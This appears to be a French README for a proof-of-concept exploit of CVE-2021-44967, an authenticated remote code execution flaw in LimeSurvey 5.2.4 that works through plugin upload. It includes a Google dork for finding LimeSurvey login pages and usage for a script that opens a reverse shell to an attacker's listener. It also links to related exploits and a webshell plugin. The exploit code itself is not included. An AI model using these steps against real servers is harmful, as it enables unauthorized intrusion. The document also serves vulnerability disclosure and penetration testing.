
POC exploit for CVE-2021-44967
# Exploit Title: LimeSurvey 5.2.4 - Exécution de code à distance authentifiée (RCE)
# Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login
# Date: 05/12/2021
# Découvert par: Y1LD1R1M
# Auteur de l'exploit: D3Ext
# Page d'accueil du fournisseur: https://www.limesurvey.org/
# Lien du logiciel: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip
# Version: 5.2.x
# Testé sur: Kali Linux 2025
# CVE: CVE-2021-44967
Une vulnérabilité d'exécution de code à distance (RCE) existe dans LimeSurvey 5.2.4 via la fonction de téléchargement et d'installation de plugins, qui pourrait permettre à un utilisateur malveillant distant de télécharger un fichier de code PHP arbitraire.
Voici les étapes à suivre pour exploiter manuellement cette vulnérabilité :
usage: CVE-2021-44967.py [-h] --url URL --user USER --password PASSWORD --lhost LHOST --lport LPORT [--verbose]
CVE-2021-44967 - RCE authentifié LimeSurvey
options:
-h, --help afficher ce message d'aide et quitter
--url URL URL de la racine web de LimeSurvey
--user USER nom d'utilisateur pour se connecter
--password PASSWORD mot de passe de l'utilisateur
--lhost LHOST hôte local pour recevoir le shell inverse
--lport LPORT port local pour recevoir le shell inverse
--verbose activer le mode verbeux
Démarrez un écouteur netcat puis exécutez l'exploit comme ceci :
python3 --url <URL> --user <username> --password <password> --lhost <local host> --lport <local port>
https://github.com/Y1LD1R1M-1337/Limesurvey-RCE
https://www.exploit-db.com/exploits/50573
https://github.com/p0dalirius/LimeSurvey-webshell-plugin
https://ine.com/blog/cve-2021-44967-limesurvey-rce
https://pentest-tools.com/vulnerabilities-exploits/limesurvey-524-rce-vulnerability_13029
Ce projet est sous licence MIT
Copyright © 2025, D3Ext